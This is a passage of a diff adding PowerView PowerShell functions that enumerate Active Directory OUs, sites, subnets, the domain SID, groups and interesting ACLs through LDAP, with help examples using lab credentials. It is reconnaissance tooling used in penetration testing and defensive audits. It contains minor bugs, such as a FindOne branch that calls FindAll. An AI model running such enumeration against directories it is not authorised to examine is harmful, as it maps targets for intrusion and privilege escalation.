+ $IdentityReferenceClass = 'computer' + } + elseif ($Object.Properties.objectclass -match 'group') { + $IdentityReferenceClass = 'group' + } + elseif ($Object.Properties.objectclass -match 'user') { + $IdentityReferenceClass = 'user' + } + else { + $IdentityReferenceClass = $Null + } + + # save so we don't look up more than once + $ResolvedSIDs[$_.SecurityIdentifier.Value] = $IdentityReferenceName, $IdentityReferenceDomain, $IdentityReferenceDN, $IdentityReferenceClass + + $InterestingACL = New-Object PSObject + $InterestingACL | Add-Member NoteProperty 'ObjectDN' $_.ObjectDN + $InterestingACL | Add-Member NoteProperty 'AceQualifier' $_.AceQualifier + $InterestingACL | Add-Member NoteProperty 'ActiveDirectoryRights' $_.ActiveDirectoryRights + if ($_.ObjectAceType) { + $InterestingACL | Add-Member NoteProperty 'ObjectAceType' $_.ObjectAceType + } + else { + $InterestingACL | Add-Member NoteProperty 'ObjectAceType' 'None' + } + $InterestingACL | Add-Member NoteProperty 'AceFlags' $_.AceFlags + $InterestingACL | Add-Member NoteProperty 'AceType' $_.AceType + $InterestingACL | Add-Member NoteProperty 'InheritanceFlags' $_.InheritanceFlags + $InterestingACL | Add-Member NoteProperty 'SecurityIdentifier' $_.SecurityIdentifier + $InterestingACL | Add-Member NoteProperty 'IdentityReferenceName' $IdentityReferenceName + $InterestingACL | Add-Member NoteProperty 'IdentityReferenceDomain' $IdentityReferenceDomain + $InterestingACL | Add-Member NoteProperty 'IdentityReferenceDN' $IdentityReferenceDN + $InterestingACL | Add-Member NoteProperty 'IdentityReferenceClass' $IdentityReferenceClass + $InterestingACL + } + } + else { + Write-Warning "[Find-InterestingDomainAcl] Unable to convert SID '$($_.SecurityIdentifier.Value )' to a distinguishedname with Convert-ADName" + } + } + } + } + } + } +} + + +function Get-DomainOU { +<# +.SYNOPSIS + +Search for all organization units (OUs) or specific OU objects in AD. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty + +.DESCRIPTION + +Builds a directory searcher object using Get-DomainSearcher, builds a custom +LDAP filter based on targeting/filter parameters, and searches for all objects +matching the criteria. To only return specific properties, use +"-Properties whencreated,usnchanged,...". By default, all OU objects for +the current domain are returned. + +.PARAMETER Identity + +An OU name (e.g. TestOU), DistinguishedName (e.g. OU=TestOU,DC=testlab,DC=local), or +GUID (e.g. 8a9ba22a-8977-47e6-84ce-8c26af4e1e6a). Wildcards accepted. + +.PARAMETER GPLink + +Only return OUs with the specified GUID in their gplink property. + +.PARAMETER Domain + +Specifies the domain to use for the query, defaults to the current domain. + +.PARAMETER LDAPFilter + +Specifies an LDAP query string that is used to filter Active Directory objects. + +.PARAMETER Properties + +Specifies the properties of the output object to retrieve from the server. + +.PARAMETER SearchBase + +The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. + +.PARAMETER SearchScope + +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. + +.PARAMETER SecurityMasks + +Specifies an option for examining security information of a directory object. +One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'. + +.PARAMETER FindOne + +Only return one result object. + +.PARAMETER Tombstone + +Switch. Specifies that the searcher should also return deleted/tombstoned objects. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.PARAMETER Raw + +Switch. Return raw results instead of translating the fields into a custom PSObject. + +.EXAMPLE + +Get-DomainOU + +Returns the current OUs in the domain. + +.EXAMPLE + +Get-DomainOU *admin* -Domain testlab.local + +Returns all OUs with "admin" in their name in the testlab.local domain. + +.EXAMPLE + +Get-DomainOU -GPLink "F260B76D-55C8-46C5-BEF1-9016DD98E272" + +Returns all OUs with linked to the specified group policy object. + +.EXAMPLE + +"*admin*","*server*" | Get-DomainOU + +Search for OUs with the specific names. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainOU -Credential $Cred + +.OUTPUTS + +PowerView.OU + +Custom PSObject with translated OU property fields. +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerView.OU')] + [CmdletBinding()] + Param ( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('Name')] + [String[]] + $Identity, + + [ValidateNotNullOrEmpty()] + [String] + [Alias('GUID')] + $GPLink, + + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [ValidateNotNullOrEmpty()] + [Alias('Filter')] + [String] + $LDAPFilter, + + [ValidateNotNullOrEmpty()] + [String[]] + $Properties, + + [ValidateNotNullOrEmpty()] + [Alias('ADSPath')] + [String] + $SearchBase, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', + + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')] + [String] + $SecurityMasks, + + [Switch] + $Tombstone, + + [Alias('ReturnOne')] + [Switch] + $FindOne, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty, + + [Switch] + $Raw + ) + + BEGIN { + $SearcherArguments = @{} + if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain } + if ($PSBoundParameters['Properties']) { $SearcherArguments['Properties'] = $Properties } + if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase } + if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['SecurityMasks']) { $SearcherArguments['SecurityMasks'] = $SecurityMasks } + if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential } + $OUSearcher = Get-DomainSearcher @SearcherArguments + } + + PROCESS { + if ($OUSearcher) { + $IdentityFilter = '' + $Filter = '' + $Identity | Where-Object {$_} | ForEach-Object { + $IdentityInstance = $_.Replace('(', '\28').Replace(')', '\29') + if ($IdentityInstance -match '^OU=.*') { + $IdentityFilter += "(distinguishedname=$IdentityInstance)" + if ((-not $PSBoundParameters['Domain']) -and (-not $PSBoundParameters['SearchBase'])) { + # if a -Domain isn't explicitly set, extract the object domain out of the distinguishedname + # and rebuild the domain searcher + $IdentityDomain = $IdentityInstance.SubString($IdentityInstance.IndexOf('DC=')) -replace 'DC=','' -replace ',','.' + Write-Verbose "[Get-DomainOU] Extracted domain '$IdentityDomain' from '$IdentityInstance'" + $SearcherArguments['Domain'] = $IdentityDomain + $OUSearcher = Get-DomainSearcher @SearcherArguments + if (-not $OUSearcher) { + Write-Warning "[Get-DomainOU] Unable to retrieve domain searcher for '$IdentityDomain'" + } + } + } + else { + try { + $GuidByteString = (-Join (([Guid]$IdentityInstance).ToByteArray() | ForEach-Object {$_.ToString('X').PadLeft(2,'0')})) -Replace '(..)','\$1' + $IdentityFilter += "(objectguid=$GuidByteString)" + } + catch { + $IdentityFilter += "(name=$IdentityInstance)" + } + } + } + if ($IdentityFilter -and ($IdentityFilter.Trim() -ne '') ) { + $Filter += "(|$IdentityFilter)" + } + + if ($PSBoundParameters['GPLink']) { + Write-Verbose "[Get-DomainOU] Searching for OUs with $GPLink set in the gpLink property" + $Filter += "(gplink=*$GPLink*)" + } + + if ($PSBoundParameters['LDAPFilter']) { + Write-Verbose "[Get-DomainOU] Using additional LDAP filter: $LDAPFilter" + $Filter += "$LDAPFilter" + } + + $OUSearcher.filter = "(&(objectCategory=organizationalUnit)$Filter)" + Write-Verbose "[Get-DomainOU] Get-DomainOU filter string: $($OUSearcher.filter)" + + if ($PSBoundParameters['FindOne']) { $Results = $OUSearcher.FindOne() } + else { $Results = $OUSearcher.FindAll() } + $Results | Where-Object {$_} | ForEach-Object { + if ($PSBoundParameters['Raw']) { + # return raw result objects + $OU = $_ + } + else { + $OU = Convert-LDAPProperty -Properties $_.Properties + } + $OU.PSObject.TypeNames.Insert(0, 'PowerView.OU') + $OU + } + if ($Results) { + try { $Results.dispose() } + catch { + Write-Verbose "[Get-DomainOU] Error disposing of the Results object: $_" + } + } + $OUSearcher.dispose() + } + } +} + + +function Get-DomainSite { +<# +.SYNOPSIS + +Search for all sites or specific site objects in AD. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty + +.DESCRIPTION + +Builds a directory searcher object using Get-DomainSearcher, builds a custom +LDAP filter based on targeting/filter parameters, and searches for all objects +matching the criteria. To only return specific properties, use +"-Properties whencreated,usnchanged,...". By default, all site objects for +the current domain are returned. + +.PARAMETER Identity + +An site name (e.g. Test-Site), DistinguishedName (e.g. CN=Test-Site,CN=Sites,CN=Configuration,DC=testlab,DC=local), or +GUID (e.g. c37726ef-2b64-4524-b85b-6a9700c234dd). Wildcards accepted. + +.PARAMETER GPLink + +Only return sites with the specified GUID in their gplink property. + +.PARAMETER Domain + +Specifies the domain to use for the query, defaults to the current domain. + +.PARAMETER LDAPFilter + +Specifies an LDAP query string that is used to filter Active Directory objects. + +.PARAMETER Properties + +Specifies the properties of the output object to retrieve from the server. + +.PARAMETER SearchBase + +The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. + +.PARAMETER SearchScope + +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. + +.PARAMETER SecurityMasks + +Specifies an option for examining security information of a directory object. +One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'. + +.PARAMETER Tombstone + +Switch. Specifies that the searcher should also return deleted/tombstoned objects. + +.PARAMETER FindOne + +Only return one result object. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.PARAMETER Raw + +Switch. Return raw results instead of translating the fields into a custom PSObject. + +.EXAMPLE + +Get-DomainSite + +Returns the current sites in the domain. + +.EXAMPLE + +Get-DomainSite *admin* -Domain testlab.local + +Returns all sites with "admin" in their name in the testlab.local domain. + +.EXAMPLE + +Get-DomainSite -GPLink "F260B76D-55C8-46C5-BEF1-9016DD98E272" + +Returns all sites with linked to the specified group policy object. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainSite -Credential $Cred + +.OUTPUTS + +PowerView.Site + +Custom PSObject with translated site property fields. +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerView.Site')] + [CmdletBinding()] + Param ( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('Name')] + [String[]] + $Identity, + + [ValidateNotNullOrEmpty()] + [String] + [Alias('GUID')] + $GPLink, + + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [ValidateNotNullOrEmpty()] + [Alias('Filter')] + [String] + $LDAPFilter, + + [ValidateNotNullOrEmpty()] + [String[]] + $Properties, + + [ValidateNotNullOrEmpty()] + [Alias('ADSPath')] + [String] + $SearchBase, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', + + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')] + [String] + $SecurityMasks, + + [Switch] + $Tombstone, + + [Alias('ReturnOne')] + [Switch] + $FindOne, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty, + + [Switch] + $Raw + ) + + BEGIN { + $SearcherArguments = @{ + 'SearchBasePrefix' = 'CN=Sites,CN=Configuration' + } + if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain } + if ($PSBoundParameters['Properties']) { $SearcherArguments['Properties'] = $Properties } + if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase } + if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['SecurityMasks']) { $SearcherArguments['SecurityMasks'] = $SecurityMasks } + if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential } + $SiteSearcher = Get-DomainSearcher @SearcherArguments + } + + PROCESS { + if ($SiteSearcher) { + $IdentityFilter = '' + $Filter = '' + $Identity | Where-Object {$_} | ForEach-Object { + $IdentityInstance = $_.Replace('(', '\28').Replace(')', '\29') + if ($IdentityInstance -match '^CN=.*') { + $IdentityFilter += "(distinguishedname=$IdentityInstance)" + if ((-not $PSBoundParameters['Domain']) -and (-not $PSBoundParameters['SearchBase'])) { + # if a -Domain isn't explicitly set, extract the object domain out of the distinguishedname + # and rebuild the domain searcher + $IdentityDomain = $IdentityInstance.SubString($IdentityInstance.IndexOf('DC=')) -replace 'DC=','' -replace ',','.' + Write-Verbose "[Get-DomainSite] Extracted domain '$IdentityDomain' from '$IdentityInstance'" + $SearcherArguments['Domain'] = $IdentityDomain + $SiteSearcher = Get-DomainSearcher @SearcherArguments + if (-not $SiteSearcher) { + Write-Warning "[Get-DomainSite] Unable to retrieve domain searcher for '$IdentityDomain'" + } + } + } + else { + try { + $GuidByteString = (-Join (([Guid]$IdentityInstance).ToByteArray() | ForEach-Object {$_.ToString('X').PadLeft(2,'0')})) -Replace '(..)','\$1' + $IdentityFilter += "(objectguid=$GuidByteString)" + } + catch { + $IdentityFilter += "(name=$IdentityInstance)" + } + } + } + if ($IdentityFilter -and ($IdentityFilter.Trim() -ne '') ) { + $Filter += "(|$IdentityFilter)" + } + + if ($PSBoundParameters['GPLink']) { + Write-Verbose "[Get-DomainSite] Searching for sites with $GPLink set in the gpLink property" + $Filter += "(gplink=*$GPLink*)" + } + + if ($PSBoundParameters['LDAPFilter']) { + Write-Verbose "[Get-DomainSite] Using additional LDAP filter: $LDAPFilter" + $Filter += "$LDAPFilter" + } + + $SiteSearcher.filter = "(&(objectCategory=site)$Filter)" + Write-Verbose "[Get-DomainSite] Get-DomainSite filter string: $($SiteSearcher.filter)" + + if ($PSBoundParameters['FindOne']) { $Results = $SiteSearcher.FindAll() } + else { $Results = $SiteSearcher.FindAll() } + $Results | Where-Object {$_} | ForEach-Object { + if ($PSBoundParameters['Raw']) { + # return raw result objects + $Site = $_ + } + else { + $Site = Convert-LDAPProperty -Properties $_.Properties + } + $Site.PSObject.TypeNames.Insert(0, 'PowerView.Site') + $Site + } + if ($Results) { + try { $Results.dispose() } + catch { + Write-Verbose "[Get-DomainSite] Error disposing of the Results object" + } + } + $SiteSearcher.dispose() + } + } +} + + +function Get-DomainSubnet { +<# +.SYNOPSIS + +Search for all subnets or specific subnets objects in AD. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty + +.DESCRIPTION + +Builds a directory searcher object using Get-DomainSearcher, builds a custom +LDAP filter based on targeting/filter parameters, and searches for all objects +matching the criteria. To only return specific properties, use +"-Properties whencreated,usnchanged,...". By default, all subnet objects for +the current domain are returned. + +.PARAMETER Identity + +An subnet name (e.g. '192.168.50.0/24'), DistinguishedName (e.g. 'CN=192.168.50.0/24,CN=Subnets,CN=Sites,CN=Configuratioiguration,DC=testlab,DC=local'), +or GUID (e.g. c37726ef-2b64-4524-b85b-6a9700c234dd). Wildcards accepted. + +.PARAMETER SiteName + +Only return subnets from the specified SiteName. + +.PARAMETER Domain + +Specifies the domain to use for the query, defaults to the current domain. + +.PARAMETER LDAPFilter + +Specifies an LDAP query string that is used to filter Active Directory objects. + +.PARAMETER Properties + +Specifies the properties of the output object to retrieve from the server. + +.PARAMETER SearchBase + +The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. + +.PARAMETER SearchScope + +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. + +.PARAMETER SecurityMasks + +Specifies an option for examining security information of a directory object. +One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'. + +.PARAMETER Tombstone + +Switch. Specifies that the searcher should also return deleted/tombstoned objects. + +.PARAMETER FindOne + +Only return one result object. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.PARAMETER Raw + +Switch. Return raw results instead of translating the fields into a custom PSObject. + +.EXAMPLE + +Get-DomainSubnet + +Returns the current subnets in the domain. + +.EXAMPLE + +Get-DomainSubnet *admin* -Domain testlab.local + +Returns all subnets with "admin" in their name in the testlab.local domain. + +.EXAMPLE + +Get-DomainSubnet -GPLink "F260B76D-55C8-46C5-BEF1-9016DD98E272" + +Returns all subnets with linked to the specified group policy object. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainSubnet -Credential $Cred + +.OUTPUTS + +PowerView.Subnet + +Custom PSObject with translated subnet property fields. +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerView.Subnet')] + [CmdletBinding()] + Param ( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('Name')] + [String[]] + $Identity, + + [ValidateNotNullOrEmpty()] + [String] + $SiteName, + + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [ValidateNotNullOrEmpty()] + [Alias('Filter')] + [String] + $LDAPFilter, + + [ValidateNotNullOrEmpty()] + [String[]] + $Properties, + + [ValidateNotNullOrEmpty()] + [Alias('ADSPath')] + [String] + $SearchBase, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', + + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')] + [String] + $SecurityMasks, + + [Switch] + $Tombstone, + + [Alias('ReturnOne')] + [Switch] + $FindOne, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty, + + [Switch] + $Raw + ) + + BEGIN { + $SearcherArguments = @{ + 'SearchBasePrefix' = 'CN=Subnets,CN=Sites,CN=Configuration' + } + if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain } + if ($PSBoundParameters['Properties']) { $SearcherArguments['Properties'] = $Properties } + if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase } + if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['SecurityMasks']) { $SearcherArguments['SecurityMasks'] = $SecurityMasks } + if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential } + $SubnetSearcher = Get-DomainSearcher @SearcherArguments + } + + PROCESS { + if ($SubnetSearcher) { + $IdentityFilter = '' + $Filter = '' + $Identity | Where-Object {$_} | ForEach-Object { + $IdentityInstance = $_.Replace('(', '\28').Replace(')', '\29') + if ($IdentityInstance -match '^CN=.*') { + $IdentityFilter += "(distinguishedname=$IdentityInstance)" + if ((-not $PSBoundParameters['Domain']) -and (-not $PSBoundParameters['SearchBase'])) { + # if a -Domain isn't explicitly set, extract the object domain out of the distinguishedname + # and rebuild the domain searcher + $IdentityDomain = $IdentityInstance.SubString($IdentityInstance.IndexOf('DC=')) -replace 'DC=','' -replace ',','.' + Write-Verbose "[Get-DomainSubnet] Extracted domain '$IdentityDomain' from '$IdentityInstance'" + $SearcherArguments['Domain'] = $IdentityDomain + $SubnetSearcher = Get-DomainSearcher @SearcherArguments + if (-not $SubnetSearcher) { + Write-Warning "[Get-DomainSubnet] Unable to retrieve domain searcher for '$IdentityDomain'" + } + } + } + else { + try { + $GuidByteString = (-Join (([Guid]$IdentityInstance).ToByteArray() | ForEach-Object {$_.ToString('X').PadLeft(2,'0')})) -Replace '(..)','\$1' + $IdentityFilter += "(objectguid=$GuidByteString)" + } + catch { + $IdentityFilter += "(name=$IdentityInstance)" + } + } + } + if ($IdentityFilter -and ($IdentityFilter.Trim() -ne '') ) { + $Filter += "(|$IdentityFilter)" + } + + if ($PSBoundParameters['LDAPFilter']) { + Write-Verbose "[Get-DomainSubnet] Using additional LDAP filter: $LDAPFilter" + $Filter += "$LDAPFilter" + } + + $SubnetSearcher.filter = "(&(objectCategory=subnet)$Filter)" + Write-Verbose "[Get-DomainSubnet] Get-DomainSubnet filter string: $($SubnetSearcher.filter)" + + if ($PSBoundParameters['FindOne']) { $Results = $SubnetSearcher.FindOne() } + else { $Results = $SubnetSearcher.FindAll() } + $Results | Where-Object {$_} | ForEach-Object { + if ($PSBoundParameters['Raw']) { + # return raw result objects + $Subnet = $_ + } + else { + $Subnet = Convert-LDAPProperty -Properties $_.Properties + } + $Subnet.PSObject.TypeNames.Insert(0, 'PowerView.Subnet') + + if ($PSBoundParameters['SiteName']) { + # have to do the filtering after the LDAP query as LDAP doesn't let you specify + # wildcards for 'siteobject' :( + if ($Subnet.properties -and ($Subnet.properties.siteobject -like "*$SiteName*")) { + $Subnet + } + elseif ($Subnet.siteobject -like "*$SiteName*") { + $Subnet + } + } + else { + $Subnet + } + } + if ($Results) { + try { $Results.dispose() } + catch { + Write-Verbose "[Get-DomainSubnet] Error disposing of the Results object: $_" + } + } + $SubnetSearcher.dispose() + } + } +} + + +function Get-DomainSID { +<# +.SYNOPSIS + +Returns the SID for the current domain or the specified domain. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainComputer + +.DESCRIPTION + +Returns the SID for the current domain or the specified domain by executing +Get-DomainComputer with the -LDAPFilter set to (userAccountControl:1.2.840.113556.1.4.803:=8192) +to search for domain controllers through LDAP. The SID of the returned domain controller +is then extracted. + +.PARAMETER Domain + +Specifies the domain to use for the query, defaults to the current domain. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.EXAMPLE + +Get-DomainSID + +.EXAMPLE + +Get-DomainSID -Domain testlab.local + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainSID -Credential $Cred + +.OUTPUTS + +String + +A string representing the specified domain SID. +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType([String])] + [CmdletBinding()] + Param( + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + $SearcherArguments = @{ + 'LDAPFilter' = '(userAccountControl:1.2.840.113556.1.4.803:=8192)' + } + if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain } + if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server } + if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential } + + $DCSID = Get-DomainComputer @SearcherArguments -FindOne | Select-Object -First 1 -ExpandProperty objectsid + + if ($DCSID) { + $DCSID.SubString(0, $DCSID.LastIndexOf('-')) + } + else { + Write-Verbose "[Get-DomainSID] Error extracting domain SID for '$Domain'" + } +} + + +function Get-DomainGroup { +<# +.SYNOPSIS + +Return all groups or specific group objects in AD. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainSearcher, Get-DomainObject, Convert-ADName, Convert-LDAPProperty + +.DESCRIPTION + +Builds a directory searcher object using Get-DomainSearcher, builds a custom +LDAP filter based on targeting/filter parameters, and searches for all objects +matching the criteria. To only return specific properties, use +"-Properties samaccountname,usnchanged,...". By default, all group objects for +the current domain are returned. To return the groups a specific user/group is +a part of, use -MemberIdentity X to execute token groups enumeration. + +.PARAMETER Identity + +A SamAccountName (e.g. Group1), DistinguishedName (e.g. CN=group1,CN=Users,DC=testlab,DC=local), +SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1114), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d202) +specifying the group to query for. Wildcards accepted. + +.PARAMETER MemberIdentity + +A SamAccountName (e.g. Group1), DistinguishedName (e.g. CN=group1,CN=Users,DC=testlab,DC=local), +SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1114), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d202) +specifying the user/group member to query for group membership. + +.PARAMETER AdminCount + +Switch. Return users with '(adminCount=1)' (meaning are/were privileged). + +.PARAMETER GroupScope + +Specifies the scope (DomainLocal, Global, or Universal) of the group(s) to search for. +Also accepts NotDomainLocal, NotGloba, and NotUniversal as negations. + +.PARAMETER GroupProperty + +Specifies a specific property to search for when performing the group search. +Possible values are Security, Distribution, CreatedBySystem, and NotCreatedBySystem. + +.PARAMETER Domain + +Specifies the domain to use for the query, defaults to the current domain. + +.PARAMETER LDAPFilter + +Specifies an LDAP query string that is used to filter Active Directory objects. + +.PARAMETER Properties + +Specifies the properties of the output object to retrieve from the server. + +.PARAMETER SearchBase + +The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. + +.PARAMETER SearchScope + +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. + +.PARAMETER SecurityMasks + +Specifies an option for examining security information of a directory object. +One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'. + +.PARAMETER Tombstone + +Switch. Specifies that the searcher should also return deleted/tombstoned objects. + +.PARAMETER FindOne + +Only return one result object. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.PARAMETER Raw + +Switch. Return raw results instead of translating the fields into a custom PSObject. + +.EXAMPLE + +Get-DomainGroup | select samaccountname + +samaccountname +-------------- +WinRMRemoteWMIUsers__ +Administrators +Users +Guests +Print Operators +Backup Operators +... + +.EXAMPLE + +Get-DomainGroup *admin* | select distinguishedname + +distinguishedname +----------------- +CN=Administrators,CN=Builtin,DC=testlab,DC=local +CN=Hyper-V Administrators,CN=Builtin,DC=testlab,DC=local +CN=Schema Admins,CN=Users,DC=testlab,DC=local +CN=Enterprise Admins,CN=Users,DC=testlab,DC=local +CN=Domain Admins,CN=Users,DC=testlab,DC=local +CN=DnsAdmins,CN=Users,DC=testlab,DC=local +CN=Server Admins,CN=Users,DC=testlab,DC=local +CN=Desktop Admins,CN=Users,DC=testlab,DC=local + +.EXAMPLE + +Get-DomainGroup -Properties samaccountname -Identity 'S-1-5-21-890171859-3433809279-3366196753-1117' | fl + +samaccountname +-------------- +Server Admins + +.EXAMPLE + +'CN=Desktop Admins,CN=Users,DC=testlab,DC=local' | Get-DomainGroup -Server primary.testlab.local -Verbose +VERBOSE: Get-DomainSearcher search string: LDAP://DC=testlab,DC=local +VERBOSE: Get-DomainGroup filter string: (&(objectCategory=group)(|(distinguishedname=CN=DesktopAdmins,CN=Users,DC=testlab,DC=local))) + +usncreated : 13245 +grouptype : -2147483646 +samaccounttype : 268435456 +samaccountname : 